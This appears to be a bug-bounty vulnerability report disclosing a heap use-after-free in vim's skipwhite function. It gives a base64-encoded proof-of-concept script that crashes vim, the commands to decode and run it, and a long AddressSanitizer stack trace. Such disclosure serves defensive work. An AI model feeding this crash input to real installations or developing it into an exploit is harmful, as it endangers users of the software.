Use After Free in vim/vim
Valid
Reported on Jan 28th 2022
Description
A use after free occurs in the skipwhite function (charset.c:1474).
Commit: 166788c657f4b1090a31ea37a023b1f2c78790c8
Proof of Concept
$ echo -ne "ZnUgUmUwYTAoZyxuKQp+CnMvCnIwIzAKZW5kZgpzL1wlJykvXD1hMDAwKDAwMDAwMDAwMDAwMDAw
MDAwMDAwMDAwMDAwMDAwMDAwLCBSZTBhMCgnJywwMDApMDA=" | base64 -d > minimized_poc
ASAN
$ ./vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c ":qa!"
=================================================================
==6580==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000000e96 at pc 0x000000d8715c bp 0x7fff87551b20 sp 0x7fff87551b18
READ of size 1 at 0x606000000e96 thread T0
#0 0xd8715b in skipwhite /home/alkyne/fuzzing/vim-asan/src/charset.c:1474:12
#1 0xc099d6 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1803:9
#2 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#3 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#4 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#5 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#6 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#7 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#8 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#9 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#10 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#11 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#12 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#13 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#14 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#15 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#16 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#17 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#18 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#19 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#20 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#21 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#22 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#23 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#24 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#25 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#26 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#27 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#28 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#29 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#30 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#31 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#32 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#33 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#34 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#35 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#36 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#37 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#38 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#39 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#40 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#41 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#42 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#43 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#44 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#45 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#46 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#47 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#48 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#49 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#50 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#51 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#52 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#53 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#54 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#55 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#56 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#57 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#58 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#59 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#60 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#61 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#62 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#63 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#64 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#65 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#66 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#67 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#68 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#69 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#70 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#71 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#72 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#73 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#74 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#75 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#76 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#77 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#78 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#79 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#80 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#81 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#82 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#83 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#84 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#85 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#86 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#87 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#88 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#89 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#90 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#91 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#92 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#93 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#94 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#95 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#96 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#97 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#98 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#99 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#100 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#101 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#102 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#103 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#104 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#105 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#106 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#107 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#108 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#109 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#110 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#111 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#112 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#113 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#114 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#115 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#116 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#117 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#118 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#119 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#120 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#121 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#122 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#123 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#124 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#125 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#126 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#127 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#128 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#129 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#130 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#131 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#132 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#133 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#134 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#135 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#136 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#137 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#138 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#139 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#140 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#141 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#142 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#143 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#144 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#145 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#146 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#147 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#148 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#149 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#150 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#151 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#152 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#153 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#154 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#155 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#156 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#157 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#158 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#159 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#160 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#161 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#162 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#163 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#164 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#165 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#166 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#167 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#168 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#169 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#170 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#171 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#172 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#173 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#174 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#175 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#176 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#177 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#178 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#179 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#180 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#181 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#182 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#183 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#184 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#185 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#186 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#187 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#188 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#189 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#190 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#191 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#192 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#193 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#194 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#195 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#196 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#197 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#198 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#199 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#200 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#201 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#202 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#203 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#204 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#205 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#206 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#207 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#208 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#209 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#210 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#211 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#212 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#213 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#214 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#215 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#216 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#217 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#218 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#219 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#220 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#221 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#222 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#223 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#224 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#225 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#226 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#227 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#228 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#229 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#230 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#231 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#232 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#233 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#234 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#235 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#236 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#237 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#238 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#239 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#240 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#241 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#242 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#243 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#244 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#245 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#246 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#247 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#248 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#249 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#250 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#251 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#252 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#253 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#254 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#255 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#256 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#257 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#258 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#259 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#260 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#261 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#262 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#263 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#264 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#265 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#266 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#267 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#268 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#269 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#270 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#271 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#272 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#273 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#274 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#275 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#276 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#277 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#278 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#279 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#280 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#281 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#282 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#283 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#284 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#285 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#286 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#287 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#288 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#289 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#290 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#291 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#292 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#293 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#294 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#295 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
0x606000000e96 is located 54 bytes inside of 57-byte region [0x606000000e60,0x606000000e99)
freed by thread T0 here:
#0 0x496f8d in free (/home/alkyne/fuzzing/vim-asan/src/vim+0x496f8d)
#1 0x66d171 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:3789:3
#2 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
